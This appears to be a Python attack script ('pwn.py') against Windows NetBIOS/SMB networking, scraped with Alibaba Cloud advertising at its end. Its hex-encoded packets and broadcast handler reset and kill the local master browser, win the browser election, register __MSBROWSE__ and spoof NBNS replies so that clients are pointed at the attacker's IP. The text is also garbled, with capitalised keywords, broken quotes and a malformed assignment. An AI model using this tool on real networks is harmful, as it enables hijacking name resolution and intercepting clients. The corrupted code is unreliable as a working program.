# More Info: html "> http://g-laurent.blogspot.com/2010/04/turning-smb-client-bug-to-server-side.html
Import sys, SocketServer, socket, threading, time, random
From random import *
From time import sleep
From socket import *
If len (sys. argv) <= 2:
Sys. exit (Usage: pwn. py Your_ip Broadcast_ip Example: pwn. py 10.0.0.1 10.0.0.255)
Ip = str (sys. argv [1])
Nbns = str (sys. argv [2]), 137
Browser = str( sys. argv [2]), 138
Elec = "x42x4fx00"
Domainmasterbro = "x42x4cx00"
# BROWSER election request
Browserelect = [chr (int (a, 16) for a in """
11 02 bd 82 c0 a8 00 96 00 8a 00 AE 00 00 20 46
47 45 4e 45 43 45 46 49 43 41 41 43 41 43
41 43 41 43 41 43 41 43 43 41 41 41 41 00
20 46 48 45 50 46 45 4c 45 48 46 45 50 46
46 46 41 43 41 43 41 43 43 41 43 41 43 43 41 42
4f 00 ff 53 4d 42 25 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 11 00 00 14 00 00 00 00 00 00 00 e8
03 00 00 00 00 00 00 00 00 14 00 56 00 03 00 01
00 01 00 02 00 25 00 5c 4d 41 49 4c 53 4c 4f 54
5c 42 52 4f 57 53 45 00 08 09 a8 0f 01 20 1b e9
A5 00 00 00 00 00 56 4d 42 4f 58 00 ". split ()]
# Local Master Announcement
Browsermaster = [chr (int (a, 16) for a in """
11 02 bd 2c c0 a8 00 96 00 8a 00 bb 00 00 20 45
4e 45 42 46 44 46 45 46 43 43 41 41 43
41 43 41 43 41 43 41 43 43 41 43 41 43 41 00
20 46 48 45 50 46 45 4c 45 48 46 45 50 46
46 46 41 43 41 43 41 43 43 41 43 41 43 43 41 42
4f 00 ff 53 4d 42 25 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 11 00 00 21 00 00 00 00 00 00 00 e8
03 00 00 00 00 00 00 00 00 21 00 56 00 03 00 01
00 00 00 02 00 32 00 5c 4d 41 49 4c 53 4c 4f 54
5c 42 52 4f 57 53 45 00 0f 00 80 fc 0a 00 4d 41
53 54 45 52 00 00 00 00 00 00 00 00 00 06
2b 10 84 00 00 0f 01 55 aa 00 ". split ()]
Resetcache = [chr (int (a, 16) for a in """
11 0a 6b a8 c0 a8 0a 66 00 8a 00 c5 00 00 20 45
4e 45 42 46 44 46 45 46 43 43 41 41 43
41 43 41 43 41 43 41 43 43 41 43 41 43 41 00
20 41 42 41 43 46 50 46 45 4e 46 44 45 43 46
43 45 50 46 48 46 44 46 46 50 46 41 41
42 00 ff 53 4d 42 25 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 11 00 00 2b 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 2b 00 56 00 03 00 01
00 01 00 02 00 3c 00 5c 4d 41 49 4c 53 4c 4f 54
5c 42 52 4f 57 53 45 00 0e 02 ". split ()]
Resetlbm = [chr (int (a, 16) for a in """
11 0a 6b a8 c0 a8 0a 66 00 8a 00 c5 00 00 20 45
4e 45 42 46 44 46 45 46 43 43 41 41 43
41 43 41 43 41 43 41 43 43 41 43 41 43 41 00
20 41 42 41 43 46 50 46 45 4e 46 44 45 43 46
43 45 50 46 48 46 44 46 46 50 46 41 41
42 00 ff 53 4d 42 25 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 11 00 00 2b 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 2b 00 56 00 03 00 01
00 01 00 02 00 3c 00 5c 4d 41 49 4c 53 4c 4f 54
5c 42 52 4f 57 53 45 00 0e 01 ". split ()]
# Browser Master annoncement
Masterannon = [chr (int (a, 16) for a in """
11 02 bd 2c c0 a8 00 96 00 8a 00 bb 00 00 20 45
4e 45 42 46 44 46 45 46 43 43 41 41 43
41 43 41 43 41 43 41 43 43 41 43 41 43 41 00
20 46 48 45 50 46 45 4c 45 48 46 45 50 46
46 46 41 43 41 43 41 43 43 41 43 41 43 43 41 42
4f 00 ff 53 4d 42 25 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 11 00 00 21 00 00 00 00 00 00 00 e8
03 00 00 00 00 00 00 00 00 21 00 56 00 03 00 01
00 00 00 02 00 32 00 5c 4d 41 49 4c 53 4c 4f 54
5c 42 52 4f 57 53 45 00 0d 4d 41 53 54 45 52 00 ". split ()]
Regmsbrowse = [chr (int (a, 16) for a in """
Be 6e 29 10 00 01 00 00 00 01 20 41 42 41
43 46 50 46 50 45 4e 46 44 45 43 46 45 50 46
48 46 44 45 46 46 50 50 41 41 42 00 00 20
00 01 c0 0c 00 20 00 01 00 04 93 e0 00 06 80 00
C0 a8 00 96 ". split ()]
# NBNS Spoofing
Spoof = [chr (int (a, 16) for a in """
08 f3 85 80 00 00 00 00 00 00 00 20 46 48 45
50 46 43 45 4c 45 48 46 45 50 46 46 41 43
41 43 41 43 41 43 41 43 43 41 42 4e 00 00 20
00 01 00 04 93 e0 00 06 00 00 ". split ()]
Def nametid (data, packet, service ):
Pack = packet [:]
Pack [2: 4] = data [2: 4] # Transaction ID
Pack [4: 8] = inet_aton (str (sys. argv [1]) # OurIP Addres
Pack [48: 82] = data [48: 79] + service # Service/domain name
Return pack
Def nametidrand (data, packet, service ):
Pack = packet [:]
Pack [] = "x80" + str (chr (choice (range (256) # Transaction ID
Pack [4: 8] = inet_aton (str (sys. argv [1]) # OurIP Addres
Pack [48: 82] = data [48: 79] + service # Service/domain name
Return pack
Def addipbrow (packet ):
Pack = packet [:]
Pack [4: 8] = inet_aton (str (sys. argv [1])
Return pack
Def addipnb (packet ):
Pack = packet [:]
Pack [len (packet)-4:] = inet_aton (str (sys. argv [1])
Return pack
Def sockbroad (packet, host ):
S = socket (AF_INET, SOCK_DGRAM)
S. setsockopt (SOL_SOCKET, SO_BROADCAST, 1)
S. sendto (packet, host)
Class BROWSER (SocketServer. BaseRequestHandler ):
Def server_bind (self ):
Self. socket. setsockopt (SOL_SOCKET, SO_REUSEADDR, SO_REUSEPORT, 1)
Self. socket. bind (self. server_address)
Def handle (self ):
Ip = inet_aton (str (sys. argv [1])
Request, socket = self. request
Data = request
Print "From:", self. client_address
If data [168] = "x01" or data [168] = "x0f" or data [168] = "x08" and self. client_address [0]! = Sys. argv [1]:
Sockbroad (. join (addipbrow (resetcache), browser)
Print "[+] LMB cache Successfully Reseted"
Sockbroad (. join (addipbrow (resetlbm), browser)
Print "[+] LMB Successfully killed"
For x in range (4 ):
Sockbroad (. join (nametid (data, browserelect, elec), browser)
Sleep (0.8)
Print "[+] Election Won! "
For x in range (4 ):
Sleep (0.5)
Sockbroad (. join (addipnb (regmsbrowse), nbns)
Print "[+] Now Register _ MSBROWSE _:]"
Sockbroad (. join (nametidrand (data, browsermaster, elec), browser)
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
